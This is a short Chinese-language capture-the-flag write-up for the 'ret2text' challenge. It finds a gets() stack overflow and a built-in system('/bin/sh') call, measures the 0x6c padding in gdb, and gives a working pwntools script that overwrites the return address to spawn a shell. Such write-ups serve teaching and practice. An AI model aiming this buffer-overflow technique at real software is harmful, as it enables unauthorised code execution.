1.首先运行一下程序
2.简单地检查一下程序,32位程序,开启了部分Relro保护,有NX保护(其实并没有什么影响)
3.观察 main 函数不难发现是通过 gets() 函数输入来覆盖返回值。
4.在 ida 里发现有 system("/bin/sh") 的代码,这样其实我们以及可以构造 exp 了,现在只需要测出覆盖长度即可
5.载入 gdb 中在 call gets 处下一个断点,之后查看寄存器(不同系统可能有所不同)
EBP: 0xffffd168 --> 0x0
ESP: 0xffffd0e0 --> 0xffffd0fc --> 0xf7ffd000 --> 0x26f34
6. 0x168 - 0xfc = 0x6c,之后可以写 exp 了
#!/usr/bin/env python from pwn import * #EBP = 0xffffd168 #ESP = 0xffffd0e0 -> 0xffffd0fc -> 0xf7ffd000 -> 0x26f34 #padding_num1 = d168 - d0fc = 0x6c #padding_num2 = 4 (32-bit) p = process('./ret2text') bin_sh_addr = 0x804863A payload = 'a' * (0x6c + 0x4) + p32(bin_sh_addr) p.recvuntil('thing?') p.sendline(payload) p.interactive()
